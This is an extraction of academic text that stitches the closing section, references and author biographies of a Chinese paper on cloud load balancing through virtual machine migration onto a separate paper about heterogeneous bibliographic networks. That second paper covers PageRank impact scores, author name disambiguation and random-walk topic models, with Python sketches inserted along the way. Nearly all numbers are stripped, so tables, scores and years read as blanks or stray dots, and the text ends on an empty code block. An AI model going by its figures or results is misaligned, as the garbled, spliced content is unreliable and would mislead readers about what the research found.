This paper analyzes concretely how load balancing is realized, designs the concrete details of the load balancing module, gives a further analysis of how to set up the dynamic migration framework, and then sets the indices for evaluating load balance. The characteristic of this work is that it is probability based and solves resource load balancing in the cloud environment within the dynamic migration framework. The final results show that the proposed combination of algorithms has obvious performance advantages. At present we only consider the load balance of the infrastructure layer and analyze concretely the location rule of the load migration module; for the selection rule, we consider it from the ratio aspect, from the overall consumption of migration, and from the re-migration aspect of available resources, combined with the extra migration time introduced by the trigger rule. In addition, the information used to initialize the algorithm is set manually, and load information is collected periodically with a manually set period; determining an appropriate sampling period is left for follow-up work.

References

[ ] Approach to Cloud Computing [M]. Beijing: Posts and Telecom Press.
[ ] Li Yong. The Study and Analysis of Virtual Machine Dynamic Migration Technology [academic dissertation]. NUDT.
[ ] Li Zhiwei, Wu Qingbo, Tan Yusong. The study of virtual machine dynamic migration based on the device agent mechanism. Application Research of Computers.
[ ] Kaiqi Xiong, Harry Perros. Service performance and analysis in cloud computing [C]. In Proceedings of the Congress on Services.
[ ] Shi Yangbin. A load balancing algorithm based on virtual machine live migration in the cloud environment [master's thesis]. Shanghai: Fudan University.
[ ] Dinda P, O'Hallaron D. The statistical properties of host load. In Proceedings of the Fourth Workshop on Languages, Compilers, and Run-time Systems for Scalable Computers (LCR), CMU technical report [EB/OL].
[ ] Barnsley M. Fractals Everywhere [M]. New York: Academic Press.
[ ] Zhou Wenyu, Chen Huaping, Yang Shoubao, Fang Jun. Virtual machine cluster resource scheduling based on migration [J]. Journal of Huazhong University of Science and Technology (Natural Science Edition).
[ ] Chang F, Dean J, Ghemawat S. Bigtable: a distributed storage system for structured data [J]. ACM Transactions on Computer Systems.
[ ] Chen Guoliang, Sun Guangzhong, Xu Yun. Research status and development trend of integrated parallel computing [J]. Science.

Acknowledgements

This work was supported by the National Natural Science Foundation of China, the Innovation Program of the Shanghai Municipal Education Commission, and the Hujiang Foundation.
Biographies

Sun Hong: female, Han nationality, from Beijing, China; master, associate professor and master tutor, School of Optical-Electrical and Computer Engineering, University of Shanghai for Science and Technology; doctoral student, Business School, University of Shanghai for Science and Technology. Main research directions: computer network communication and cloud computing, management science and engineering, management information and decision support systems. Email: sunhong@usst.edu.cn

Wang Weifeng: male, Han nationality; master student, School of Optical-Electrical and Computer Engineering, University of Shanghai for Science and Technology. Main research directions: cloud computing and management information systems. Email: wwfhuo@ .com

Chen Shiping: male, Han nationality, from Zhejiang, China; professor, Ph.D., doctoral tutor, Business School, University of Shanghai for Science and Technology. Research directions: computer network communication and cloud computing, management science and engineering. Email: chensp@usst.edu.cn

Xu Liping: female, Han nationality; master, associate professor, University of Shanghai for Science and Technology. Main research directions: cloud computing and management information systems. Email: @qq.com

Heterogeneous Networks and their Applications: Scientometrics, Name Disambiguation, and Topic Modeling

Ben King, Rahul Jha
Department of EECS, University of Michigan, Ann Arbor, MI
{benking,rahuljha}@umich.edu

Dragomir R. Radev
Department of EECS and School of Information, University of Michigan, Ann Arbor, MI
radev@umich.edu

Abstract

We present heterogeneous networks as a way to unify lexical networks with relational data. We build a unified ACL Anthology Network, tying together the citation, author collaboration, and term-cooccurrence networks with affiliation and venue relations. This representation proves to be convenient and allows problems such as name disambiguation, topic modeling, and the measurement of scientific impact to be easily solved using only this network and off-the-shelf graph algorithms.

Introduction

Graph-based methods have been used to great effect in NLP, on problems such as word sense disambiguation (Mihalcea), summarization (Erkan and Radev), and dependency parsing (McDonald et al.). Most previous studies of networks consider networks with only a single type of node, and in some cases using a network with a single type of node can be an oversimplified view if it ignores other types of relationships.

In this paper we will demonstrate heterogeneous networks, networks with multiple different types of nodes and edges, along with several applications of them. The applications in this paper are not presented so much as robust attempts to out-perform the current state of the art, but rather attempts at being competitive against top methods with little effort beyond the construction of the heterogeneous network. Throughout this paper, we will use the data from the ACL Anthology Network (AAN) (Bird et al.; Radev et al.), which contains additional metadata relationships not found in the ACL Anthology, as a typical heterogeneous network. The results in this paper should be generally applicable to other heterogeneous networks.

Heterogeneous AAN schema

We build a heterogeneous graph G(V, E) from AAN, where V is the set of vertices and E is the set of edges connecting vertices.
a vertex can be one of five semantic types: {paper, author, venue, institution, term}. an edge can also be one of five types, each connecting different types of vertices: • author — [writes] — paper • paper — [cites] — paper • paper — [published in] — venue • author — [affiliated with] — institution • paper — [contains] — term all of this data, except for the terms, is available for all papers in the release of aan. terms are extracted from titles by running textrank (mihal- cea and tarau, ) on np-chunks from titles and manually filtering out bad terms. we show the usefulness of this representation in several applications: the measurement of scien- tific impact (section ), name disambiguation (sec- tion ), and topic modeling (section ). the hetero- geneous network representation provides a simple framework for combining lexical networks (like the term co-occurence network) with metadata relations from a source like aan and allows us to begin to develop nlp-aware methods for problems like sci- entometrics and name disambiguation, which are not usually framed in an nlp perspective. for a joint meeting of venues a and b publishing a paper x, two edges (x, a) and (x, b) are created. author-affiliation edges are weighted according to the number of papers an author has published from an institution. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. scientific impact measurement the study of scientometrics, which attempts to quantify the scientific impact of papers, authors, etc. has received much attention recently, even within the nlp community. in the past few years, there have been many proposed measures of scientific im- pact based on relationships between entities. intu- itively, a model that can take into account many dif- ferent types of relationships between entities should be able to measure scientific impact more accu- rately than simpler measures like citation counts or h-index. we propose using pagerank on the heterogeneous aan (page et al., ) to measure scientific impact. since changes in the network schema can affect the relative rankings between different types of entities, this method is probably not appropriate for compar- ing entities of two different types against each other. but between nodes of the same type, this measure is an appropriate (and as we will show, accurate) way to compare impacts. we see this method as a first logical step in the direction of heterogeneous network-based sciento- metrics. this method could easily be extended to use a directed schema (kurland and lee, ) or a schema that is aware of the lexical content of citation sentences, such as sentiment-based signed networks (hassan et al., ). determining the intrinsic quality of scientific im- pact measures can be difficult since there is no way to collect gold standard measurements for real- world entities. previous studies have attempted to show that their measures give high scores to a few known high-impact entities, e.g. nobel prize win- ners (hirsch, ), or have performed a statistical component analysis to find the most important mea- sures in a group of related statistics (bollen et al., ). our approach, instead, is to generate real- istic data from synthetic entities whose impacts are known. we had considered alternative formulations that did not rely on synthetic data, but each of them presented problems. 
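Before the synthetic evaluation, here is a minimal sketch of the measure proposed above: a small heterogeneous graph with the five node types and five edge types, ranked with ordinary PageRank. The toy nodes and edges are assumptions, and the availability of networkx is assumed; this is not the authors' code.

```python
# Illustrative sketch (toy data): PageRank on a heterogeneous graph, with
# rankings compared only within a node type, since cross-type scores are not
# comparable.

import networkx as nx

G = nx.Graph()
nodes = [("p1", "paper"), ("p2", "paper"),
         ("a1", "author"), ("a2", "author"),
         ("v1", "venue"), ("i1", "institution"),
         ("t1", "term"), ("t2", "term")]
G.add_nodes_from((n, {"type": t}) for n, t in nodes)

G.add_edges_from([("a1", "p1"), ("a2", "p1"), ("a2", "p2"),   # writes
                  ("p2", "p1"),                                # cites
                  ("p1", "v1"), ("p2", "v1"),                  # published in
                  ("a1", "i1"), ("a2", "i1"),                  # affiliated with
                  ("p1", "t1"), ("p2", "t1"), ("p2", "t2")])   # contains

pr = nx.pagerank(G)
authors = sorted((n for n, d in G.nodes(data=True) if d["type"] == "author"),
                 key=pr.get, reverse=True)
print(authors)
```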
when we attempted manual prominence annotation for aan data, the inter- judge agreement (measured by spearman correla- tion) in our experiments ranged from decent ( . in the case of institutions) to poor ( . for authors) to nearly random ( . for terms), far too low to use in most cases. we also considered evaluating prominence measures by their ability to predict fu- ture citations to an entity. citations are often used as a proxy for impact, but our measurements have found that correlation between past citations and fu- ture citations is too high for citation prediction to be a meaningful evaluation . . creating a synthetic aan in network theory, a common technique for testing network algorithms when judgments of real-world data are expensive or impossible to obtain is to test the algorithm on a synthetic network. to create such a synthetic network, the authors define a simple, but realistic generative process by which the real-world networks of interest may arise. the properties of the network are measured to ensure that it replicates certain observable behaviors of the real-world net- work. they can then test network algorithms to see how well they are able to recover the hidden param- eters that generated the synthetic network. (pastor- satorras and vespignani, ; clauset et al., ; karrer and newman, ) we take a two-step approach to generating this synthetic data, first generating entities with known impacts, and second, linking these entities together according to their latent impacts. our heuristic is that high impact entities should be linked to other high impact entities and vice-versa. as in the net- work theory literature, we must show that this data reflects important properties observed in the true aan. one such property is that the number of citations per paper follows a power law distribution (redner, ). we observe this behavior in aan along with several other small-world behaviors, such as a small diameter, a small average shortest path length, and a high clustering coefficient in the coauthorship graph. we strive to replicate these properties in our syn- thetic data. most existing impact measurements require access to at least one year’s worth of citation information. the spearman correlation between the number of citations received after one year and after five years is . with correlation between suc- cessive years as high as . . practically this means that the measures that best correlate with citations after five years are exactly those that best correlate with citations after one year. since scientific impact measures attempt to quan- tify the true impact of entities, we can use these mea- sures to help understand how the true impact mea- sures are distributed across different entities. in fact, citation counts, being a good estimate of impact, can be used to generate these latent impact variables for each entity. for each type of entity (papers, authors, institutions, venues, and terms), we create a latent impact by sampling from the appropriate citation count distribution. after sampling, all the impacts are normalized to fall in the [ , ] interval, with the highest-impact entity of each type having a latent impact of . additive smoothing is used to avoid having an impact of . once we have created the entities, our method for placing edges is most similar to the erdős- réyni method for creating random graphs (erdős and rényi, ), in which edges are distributed uniformly at random between pairs of vertices. 
Instead of distributing links uniformly, links between entities are sampled proportionally to I(a)·I(b)·(1 − (I(a) − I(b))²), where I(x) is the latent impact of entity x. We tried several other formulae that failed to replicate the properties of the real AAN. The I(a)·I(b) part of the formula reflects a preference for nodes of any type to connect with high-impact entities (e.g., major conferences receive many submissions even though most submissions will be rejected), but the 1 − (I(a) − I(b))² part also reflects the reality that entities of similar prominence are most likely to attach to each other (e.g., well-known authors publish in major conferences, while less well-known authors may publish mostly in lesser-known workshops).

Using this distribution, we randomly sample links between papers and authors; authors and institutions; papers and venues; and papers and terms. The only exception to this was paper-to-paper citation links, for which we did not expect this same behavior to apply, as low-impact papers regularly cite high-impact papers, but not vice-versa. To model citations, we selected citing papers uniformly at random and cited papers in proportion to their impacts (Albert and Barabási). Finally, we generated a network equal in size to AAN, that is, with the exact same numbers of papers, authors, etc. and the exact same number of paper-author links, paper-venue links, etc.

Table: network properties of the synthetic AAN compared with the true AAN.
  Property                                        True value   Synthetic value
  Paper-citation power law coefficient            -            -
  Diameter                                        -            -
  Average shortest path                           -            -
  Collaboration network clustering coefficient    -            -

The table compares the observed properties of the true AAN with the observed properties of this synthetic version of AAN. None of the statistics are exact matches, but when building random graphs, it is not uncommon for measures to differ by many orders of magnitude, so a model whose measures are on the same order of magnitude as the observed data is generally considered to be a decent model (Newman and Park).

Measuring impact on the synthetic AAN

This random network is, of course, still imperfect in some regards. First of all, it has no time aspect, so it is not possible for impact to change over time, which means we cannot test against some impact measures that have a time component, like CiteRank (Maslov and Redner). Second, there are some constraints present in the real world that are not enforced here. Because the edges are randomly selected, some papers have no venues, while others have multiple venues. There is also nothing to enforce certain consistencies, such as authors publishing many papers from relatively few institutions, or repeatedly collaborating with the same authors.

We had also considered using existing random graph models such as the Barabási-Albert model (Barabási and Albert), which are known to produce graphs that exhibit power law behavior. These models, however, do not provide a way to respect the latent impacts of the entities, as they add links in proportion only to the number of existing links a node has.
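A compact sketch of the two-step generation process described above is given below: latent impacts drawn from an empirical citation-count distribution, then edges placed with probability proportional to the impact-weighted formula. The entity counts, smoothing constant, and citation samples are all assumptions for illustration, not the paper's parameters.

```python
# Illustrative sketch (not the authors' code): synthetic-network generation
# with impacts sampled from a citation-count distribution and edges sampled
# proportionally to I(a) * I(b) * (1 - (I(a) - I(b))**2).

import random

def sample_impacts(citation_counts, n_entities, smoothing=1.0, rng=random):
    """Draw n latent impacts from the empirical citation distribution,
    add additive smoothing, and normalise so the maximum impact is 1."""
    draws = [rng.choice(citation_counts) + smoothing for _ in range(n_entities)]
    top = max(draws)
    return [d / top for d in draws]

def sample_edges(impacts_a, impacts_b, n_edges, rng=random):
    """Sample edges between two entity sets, weighted by the impact formula.
    Sampling is with replacement, which is acceptable for a sketch."""
    pairs, weights = [], []
    for i, ia in enumerate(impacts_a):
        for j, ib in enumerate(impacts_b):
            pairs.append((i, j))
            weights.append(ia * ib * (1.0 - (ia - ib) ** 2))
    return rng.choices(pairs, weights=weights, k=n_edges)

# Example: a toy "paper-author" bipartite slice of the synthetic network.
observed_citations = [0, 0, 1, 1, 2, 3, 5, 8, 13, 40]   # assumed sample
papers = sample_impacts(observed_citations, n_entities=50)
authors = sample_impacts(observed_citations, n_entities=20)
paper_author_edges = sample_edges(papers, authors, n_edges=120)
```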
We measure the quality of impact measures by comparing ranked lists: the ordering of the entities by their true (but hidden) impact against their ordering according to the impact measure. The agreement between these lists is measured by Kendall's tau. The table below compares several well-known impact measures with our impact measure, PageRank centrality on the heterogeneous AAN network.

Table: agreement of various impact measures with the true latent impact.
  Paper measures: heterogeneous network PageRank; citation network PageRank; citation count.
  Author measures: heterogeneous network PageRank; coauthorship network PageRank; h-index (Hirsch); aggregated citation count; i-index.
  Institution measures: heterogeneous network PageRank; h-index (Mitra); aggregated citation count.
  Venue measures: heterogeneous network PageRank; h-index (Braun et al.); aggregated citation count; impact factor; venue citation network PageRank (Bollen et al.).

We find that some popular methods, such as h-index (Hirsch), are too coarse to accurately capture much of the underlying variation. There is a version of Kendall's tau that accounts for ties, and while this metric slightly helps the coarser measures, PageRank on the heterogeneous network is still the clear winner.

When comparing different ordering methods, it is natural to wonder which entities the orderings disagree on. In general, non-heterogeneous measures like h-index or collaboration network PageRank, which focus on only one type of relationship, can suffer when the entity in question has an important relationship of another type. For example, if an author is highly cited but mostly works alone, his contribution would be undervalued in the collaboration network, but would be more accurate in the heterogeneous network.

(Figure: evolution of conference impacts for ACL, EMNLP, COLING, and NAACL. The y-axis measures relative PageRank, the entity's PageRank relative to the average PageRank in that year.)

The majority of the differences between the impact measures, though, tend to be in how they handle entities of low prominence. It seems that, for the most part, there is relatively little disagreement in the orderings of high-impact entities between different impact measures. That is, most highly prominent entities tend to be highly rated by most measures. But when an author or a paper, for example, has only one or two citations, it can be advantageous to look at more types of relationships than just citations. The paper may be written by an otherwise prominent author, or published at a well-known venue, and having many types of relations at its disposal can help a method like heterogeneous network PageRank better distinguish between two low-prominence entities.

Top-ranked entities according to heterogeneous network PageRank

The table shows the papers, authors, institutions, venues, and terms that received the highest PageRank in the heterogeneous AAN. It is obvious that the top-ranked entities in this network are not simply the most highly cited entities. This ranking also does not have any time bias toward the entities that are currently prominent, as some of the top authors were more prolific in previous decades than at the current time. We also see this effect with COLING, which for many of the early years is the only venue in the ACL Anthology.

top papers top authors top institutions top venues top terms − building a large annotated corpus of english: the penn treebank jun'ichi tsujii carnegie mellon university coling − translation − the mathematics of statistical machine translation: parameter estimation aravind k.
joshi university of edinburgh acl speech − attention, intentions, and the structure of discourse ralph grishman university of pennsylvania hlt parsing − a maximum entropy approach to natural language processing hitoshi isahara massachusetts institute of technology eacl machine translation − bleu: a method for automatic evaluation of machine translation yuji matsumoto saarland university lrec generation − a maximum-entropy-inspired parser kathleen r. mckeown ibm t.j. watson research center − naacl evaluation a stochastic parts program and noun phrase parser for unrestricted text eduard hovy cnrs emnlp grammar a systematic comparison of various statistical alignment models christopher d. manning university of tokyo computational linguistics dialogue transformation-based error-driven learning and natural language processing: a case study in part-of-speech tagging yorick wilks stanford university ijcnlp knowl- edge a maximum entropy model for part-of-speech tagging hermann ney bbn technologies workshop on speech and natural language discourse table : the entities of each type receiving the highest scores from the heterogeneous network pagerank impact measure along with their respective changes in ranking when compared to a simple citation count measure. one possible way to address this is to use a narrower time window when creating the graph, such as only including edges from the previous five years. we apply this technique in the following section. . entity impact evolution the heterogeneous graph formalism also provides a natural way to study the evolution of impact over time, as in (hall et al., ), but at a much finer granularity. hall et al. measured the year-by-year prominence of statistical topics, but we can measure year-by-year prominence for any entity in the graph. to measure the evolution of impacts over the years, we iteratively create year-by-year versions of the heterogeneous aan. each of these graphs con- tains all entities along with all edges occurring in a five year window. due to space, we cannot com- prehensively exhibit this technique and the data it produces, but as a brief example, in figure , we show how the impacts of some major nlp confer- ences changes over time. the graph shows that naacl and emnlp have been steadily gaining prominence since their intro- ductions, but also shows that acl has had to make up a lot of ground since to surpass coling. we also notice that all the major conferences have grown in impact since , and believe that as the field continues to grow, the major conferences will continue to become more and more important. name disambiguation we frame network name disambiguation in a link prediction setting (taskar et al., ; liben-nowell and kleinberg, ). the problems of name dis- ambiguation and link prediction share many char- acteristics, and we have found that if two ambigu- ous name nodes are close enough to be selected by a link-prediction method, then they likely correspond to the same real-world author. we intend to show that the heterogeneous biblio- graphic network can be used to better disambiguate author names than the author collaboration network. the heterogeneous network for this problem con- tains papers, authors, terms, venues, and institutions. we compare several well-known network similarity measures from link prediction by transforming the network distance measure precision recall f -score rand index purity nmi heterogeneous truncated commute time . . . . . . heterogeneous shortest path . . . . . . heterogeneous propflow . . . . . 
. coauthorship truncated commute time . . . . . . coauthorship shortest path . . . . . . coauthorship propflow . . . . . . coauthorship ghost . . . . . . table : performance of different networks and distance measures on the author name disambiguation task. the performance measures are averaged over the sets of two, three, and four authors. rand index is from (rand, ) and nmi is an abbreviation for normalized mutual information (strehl and ghosh, ) similarities to distances and inducing clusters of au- thors based on these distances. we compare three distance measures: shortest path, truncated commute time (sarkar et al., ), and propflow (lichtenwalter et al., ). short- est path distance can be a useful metric for author disambiguation because it is small when two am- biguous nodes are neighbors in the graph or share a neighbor. its downside is that it only considers one path between nodes, the shortest, and cannot take advantage of the fact that there may be many short paths between two nodes. truncated commute time is a variant of commute time where all paths longer than some threshold are truncated. the truncation threshold l should be set such that no semantically meaningful path is trun- cated. we use a value of ten for l in the heteroge- neous graph and three in the coauthorship graph . the advantage of truncated commute time over or- dinary commute time is simpler calculation, as no paths longer than l need be considered. the down- side of this method is that large branching factors tend to lead to less agreement between commute time and truncated commute time. propflow is a quantity that measures the proba- bility that a non-intersecting random walk starting at node a reaches node b in l steps or fewer, where l is again a threshold. as before, l should be a bound on the length of semantically meaningful paths, so we use the same values for l as with truncated commute time. of course, propflow is not a metric, which is this is a standard coauthorship graph with the edge weights equal to the number of publications shared between authors. the heterogeneous network does not have author-to-author links, as authors are linked by paper nodes. required for some clustering methods. we use the following equation to transform propflow to a met- ric: d(a,b) = propflow(a,b) − . with each of the distance measures, we apply the same clustering method: partitioning around medoids, with the number of clusters automatically determined using the gap statistic method (tibshi- rani et al., ). we create the null distribution needed for the gap statistic method by many itera- tions of randomly sampling distances from the com- plete distance matrix between all nodes in the graph. the gap statistic method automatically selects the number of clusters from two, three, or four author clusters. we compare our methods against ghost (fan et al., ), a high-performance author disambigua- tion method based on the coauthorship graph. . data to generate name disambiguation data, we use the pseudoword method of (gale et al., ). specif- ically, we choose two or more completely random authors and conflate them by giving all instances of both authors the same name. we let each paper written by this pseudoauthor be an instance to be clustered. the clusters produced by any author dis- ambiguation method can then be compared against the papers actually written by each of the two au- thors. this method, of course, relies on having all of the underlying authors completely disambiguated, which aan provides. 
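A small sketch of the pseudoword-style data generation just described is given below: randomly chosen, fully disambiguated authors are conflated under one name, and their papers become the instances to cluster, with the original authorship kept as the gold standard. The corpus, author names, and paper identifiers are made up for the example.

```python
# Illustrative sketch (hypothetical data): building one name-disambiguation
# evaluation set by conflating n randomly chosen authors.

import random
from typing import Dict, List, Tuple

def make_conflation_set(author_papers: Dict[str, List[str]],
                        n_authors: int = 2,
                        rng: random.Random = random.Random(0)) -> List[Tuple[str, str]]:
    """Return (paper_id, true_author) pairs for one conflated pseudo-author."""
    chosen = rng.sample(sorted(author_papers), n_authors)
    instances = [(paper, author) for author in chosen
                 for paper in author_papers[author]]
    rng.shuffle(instances)      # the disambiguator only sees the paper ids
    return instances

# Toy example with made-up authors and paper ids.
corpus = {
    "a. smith":  ["P1", "P2", "P3"],
    "b. jones":  ["P4", "P5"],
    "c. garcia": ["P6", "P7", "P8"],
}
print(make_conflation_set(corpus, n_authors=2))
```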
This method is used to create disambiguation sets with two authors, with three authors, and with four authors.

Results

The table above shows the performance of author name disambiguation with different networks and distance metrics. F1-score is the measure most often used to compare author disambiguation methods. Both PropFlow and shortest path similarity on the heterogeneous network perform quite well according to this measure, as well as the other reported measures. While comparable recall can be achieved using only the coauthorship graph, the heterogeneous graph allows for much higher precision.

Random walk topic model

Here we present a topic model based entirely on graph random walks. This method is not truly a statistical model, as there are no statistical parameters being learned; it is rather a topic-discovery and -assignment method attempting to solve the same problem as statistical topic models such as probabilistic latent semantic analysis (PLSA) (Hofmann) or latent Dirichlet allocation (LDA) (Blei et al.). In the absence of better terminology, we use the name random walk topic model.

While this method does not have the robust mathematical foundation that statistical topic models possess, in its favor it has modularity, simplicity, and interpretability. The model is modular because it completely separates the discovery of topics from the association of topics with entities. It is simple because it requires only a clustering algorithm and random walk algorithms, instead of complex inference algorithms; the method also does not require any modification if the topology of the network changes, whereas statistical models may need an entirely different inference procedure if, e.g., author topics are desired in addition to paper topics. Thirdly, the method is easily interpretable, with topics provided by clustering in the word-relatedness graph and topic association based on random walks from entities to topics.

Topics from word graph clustering

From the set of ACL Anthology titles, we create two graphs: (1) a word relatedness graph, by creating a weighted link between each pair of words corresponding to the PropFlow (Lichtenwalter et al.) measure between them on the full heterogeneous graph, and (2) a word co-occurrence graph, by creating a weighted link between each pair of words corresponding to the number of titles in which both words occur. Both of these graphs are then clustered using graph factorization clustering (GFC). GFC is a soft clustering algorithm for graphs that models graph edges as a mixture of latent node-cluster association variables (Yu et al.).

Given a word graph G with vertices V and adjacency matrix [W]_ij, GFC attempts to fit a bipartite graph K(V, U) with adjacency matrix [B]_ij onto this data, with the m nodes of U representing the clusters. Whereas in G the similarity between two words i and j can be measured with w_ij, in K we can similarly measure their similarity with

    w'_ij = sum_{p=1..m} ( b_ip * b_jp / λ_p ),   where   λ_p = sum_{i=1..n} b_ip

is the degree of vertex p ∈ U. Essentially, the bipartite graph attempts to approximate the transition probability between i and j in G with the sum of transition probabilities from i to j through any of the m nodes in U. Yu et al. present an algorithm for minimizing the divergence distance

    ℓ(X, Y) = sum_{ij} ( x_ij * log(x_ij / y_ij) − x_ij + y_ij )

between [W]_ij and [W']_ij. We run GFC with this distance metric and a fixed number m of clusters on the word graph until convergence (change in log-likelihood below a small threshold).
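The two quantities defined above can be computed directly; the sketch below shows the induced similarity W' for a candidate factorization B and the divergence between W and W'. The fitting of B itself (Yu et al.'s algorithm) is not reproduced here, and the toy matrices are assumptions; any divergence-minimizing procedure could be plugged in.

```python
# Illustrative sketch of the GFC quantities defined above.

import numpy as np

def induced_similarity(B: np.ndarray) -> np.ndarray:
    """W'_ij = sum_p B_ip * B_jp / lambda_p, with lambda_p = sum_i B_ip."""
    lam = B.sum(axis=0)                       # degree of each cluster node
    return (B / lam) @ B.T

def divergence(W: np.ndarray, W_prime: np.ndarray, eps: float = 1e-12) -> float:
    """l(W, W') = sum_ij ( w_ij * log(w_ij / w'_ij) - w_ij + w'_ij )."""
    W = W + eps
    W_prime = W_prime + eps
    return float(np.sum(W * np.log(W / W_prime) - W + W_prime))

# Toy word graph with 4 words and a random 4x2 candidate factorisation.
rng = np.random.default_rng(0)
W = np.array([[0, 3, 1, 0],
              [3, 0, 2, 0],
              [1, 2, 0, 4],
              [0, 0, 4, 0]], dtype=float)
B = rng.random((4, 2))
print(divergence(W, induced_similarity(B)))
```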
after conver- gence, the nodes in u become the clusters and the weights bip (constrained to sum to for each clus- ter) become the topic-word association scores. examples of some topics found by this method are shown in table . from manual inspection of these topics, we found them to be very much like topics created by statistical topic models. we find instances of all the types of topics listed in (mimno et al., ): chained, intruded, random, and unbal- anced. for an evaluation of these topics see sec- tion . . . . entity-topic association to associate entities with topics, we first create the heterogeneous network as in previous sections, adding links between papers and their title words, along with links between words and the topics that were discovered in the previous section. word-topic links are also weighted according to the weights word sense induction sense disambiguation word induction unsupervised clustering senses based similarity chinese crfs + their applications entity named recognition random conditional fields chinese entities biomedical segmentation dependency parsing parsing dependency projective probabilistic incremental deterministic algorithm data syntactic trees tagging models tagging model latent markov conditional random parsing unsupervised segmentation multi-doc summarization summarization multi document text topic based query extractive focused summaries chinese word segmentation word segmentation chinese based alignment character tagging bakeoff model crf lexical semantics lexical semantic distributional similarity wordnet resources lexicon acquistion semantics representation cross-lingual ir cross lingual retrieval document language linguistic multi person multilingual coreference generation for summar. sentence based compression text summarization ordering approach ranking generation spoken language speech recognition automatic prosodic tagging spontaneous news broadcast understanding conversational french function words de la du des le automatique analyse une en pour question answering question answering system answer domain retrieval web based open systems unsupervised learning unsupervised discovery learning induction knowledge graph acquisition concept clustering pattern svms for nlp support vector machines errors space classification correcting word parsing detecting maxent models entropy maximum approach based attachment model models phrase prepositional disambiguation dialogue systems dialogue spoken systems human conversational multi interaction dialogues utterances multimodal semantic role-labeling semantic role labeling parsing syntactic features ill dependency formed framenet smt based translation machine statistical phrase english approach learning reordering model coreference resolution resolution coreference anaphora reference pronoun ellipsis ambiguity resolving approach pronominal semi- and weak-supervision learning supervised semi classification active data clustering approach graph weakly information retrieval based retrieval similarity models semantic space model distance measures document discourse discourse relations structure rhetorical coherence temporal representation text connectives theory cfg parsing context free grammars parsing linear probabilistic rewriting grammar systems optimal min. risk train. and decod. 
minimum efficient training error rate translation risk bayes decoding statistical phonology phoneme conversion letter phonological grapheme rules applying transliteration syllable sound sentiment sentiment opinion reviews classification mining polarity analysis predicting product features neural net speech recog. speech robust recognition real network time neural networks language environments finite state methods state finite transducers automata weighted translation parsing incremental minimal construction mechanical turk mechanical turk automatic evaluation amazon techniques data articles image scientific table : top words for several topics created by the co-occurence random walk topic model. the left column is a manual label. topic topic translation . parsing . machine . dependency . statistical . projective . machine translation . k-best spanning tree parsing . better hypothesis testing for statistical machine translation: controlling for optimizer instability . pseudo-projective dependency parsing . filtering antonymous, trend- contrasting, and polarity-dissimilar distributional paraphrases for improving statistical machine translation . shift-reduce dependency dag parsing . knight, kevin . nivre, joakim . koehn, philipp . johnson, mark . ney, hermann . nederhof, mark-jan . rwth aachen university . vaxjo university . carnegie mellon university . brown university . university of southern california . university of amsterdam . workshop on statistical machine translation . acl . emnlp . emnlp . coling . conll . table : examples of entities associated with selected topics. determined by gcf. we then simply take random walks from topics to entities and measure the pro- portion at which the random walk arrives at each en- tity of interest. these proportions become the entity- topic association scores. for example, if we wanted to find the authors most associated with topic , we would take a num- ber of random walks (say , ) starting at topic and terminating as soon as the random walk first reaches an author node. measuring the proportion at which random walks arrive at each allows us to compute an association score between topic and each author. a common problem in random walks on large graphs is that the walk can easily get “lost” between two nodes that should be very near by taking a just a few steps in the wrong direction. to keep the ran- dom walks from taking these wrong steps, we adjust the topology of the network using directed links to keep the random walks moving in the “right” direc- tion. we design the graph such that if we desire a random walk from nodes of type s to nodes of type t, the random walk will never be able to follow an out- going link that does not decrease its distance from the nodes of t. as shown in section . , there are certain nodes at which a random walk (like pagerank) arrives at more often than others simply because of their positions in the graph. this suggests that there may be stationary random walk distributions over entities, which we would need to adjust for in order to find the most significant entities for a topic. indeed this is what we do find. as an example, if we sample topics uniformly and take random walks to author nodes, by chance we end up at jun’ichi tsujii on . % of random walks, eduard hovy on . % of walks, etc. these values are about times greater than would be expected at random. 
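A minimal sketch of the walk-based association just described is given below: many walks start at a topic node and stop at the first node of the desired entity type, and arrival proportions become association scores. The directed "distance-decreasing" topology and the stationary-distribution correction discussed in the surrounding text are omitted here, and the toy graph is an assumption.

```python
# Illustrative sketch (not the authors' code): topic-to-entity association by
# random walks that terminate at the first node of the target type.

import random
from collections import Counter

def topic_entity_association(graph, node_type, topic, target_type,
                             n_walks=10000, max_steps=50,
                             rng=random.Random(0)):
    """graph: dict node -> list of neighbours; node_type: dict node -> type."""
    arrivals = Counter()
    for _ in range(n_walks):
        node = topic
        for _ in range(max_steps):
            node = rng.choice(graph[node])
            if node_type[node] == target_type:
                arrivals[node] += 1
                break
    total = sum(arrivals.values()) or 1
    return {n: c / total for n, c in arrivals.items()}

# Toy graph: one topic linked to words, words linked to papers and authors.
graph = {"topic1": ["w1", "w2"], "w1": ["topic1", "p1"], "w2": ["topic1", "p2"],
         "p1": ["w1", "auth1"], "p2": ["w2", "auth2"],
         "auth1": ["p1"], "auth2": ["p2"]}
node_type = {"topic1": "topic", "w1": "term", "w2": "term",
             "p1": "paper", "p2": "paper", "auth1": "author", "auth2": "author"}
print(topic_entity_association(graph, node_type, "topic1", "author"))
```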
To adjust for this effect, when we take a random walk from a topic x to an entity type t, we subtract out this stationary distribution for t, which corresponds to the proportion of random walks that end at any particular entity of type t by chance and not by virtue of the fact that the walk started at topic x. The resulting distribution yields the entities of t that are most significantly associated with topic x. The table above gives examples of the most significant entities for a couple of topics.

(Figure: distribution of topic coherences for the four topic models, RW-cooc, RW-sim, RTM, and LDA.)

Topic model evaluation

We provide two separate evaluations in this section: one of the topics alone, and one extrinsic evaluation of the entire paper-topic model. The variants of random walk topic models are compared against LDA and the relational topic model (RTM) (Chang and Blei), each with the same number of topics. As RTM allows only a single type of relationship between documents, we use citations as the inter-document relationships.

Topic coherence

The coherence of a topic is evaluated using the coherence metric introduced in (Mimno et al.). Given the top M words V(t) = (v_1^(t), ..., v_M^(t)) for a topic t, the coherence of that topic is

    C(t; V(t)) = sum_{m=2..M} sum_{l=1..m-1} log( ( D(v_m^(t), v_l^(t)) + 1 ) / D(v_l^(t)) )

where D(v) is the number of documents containing v and D(v, v') is the number of documents containing both v and v'. This measure of coherence is highly correlated with manual annotations of topic quality, with a higher coherence score corresponding to a more coherent, higher-quality topic. After calculating the coherence of each topic for RTM and the random-walk topic model, the average coherences for RTM topics and for word-similarity random walk topics differed with statistical significance; the figure illustrates this, showing that the word-similarity-based random walk method generates several highly coherent topics. The average coherences for LDA and for the co-occurrence random walk model were significantly lower.
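The coherence metric reconstructed above is straightforward to compute; a small sketch with toy documents and a toy topic follows.

```python
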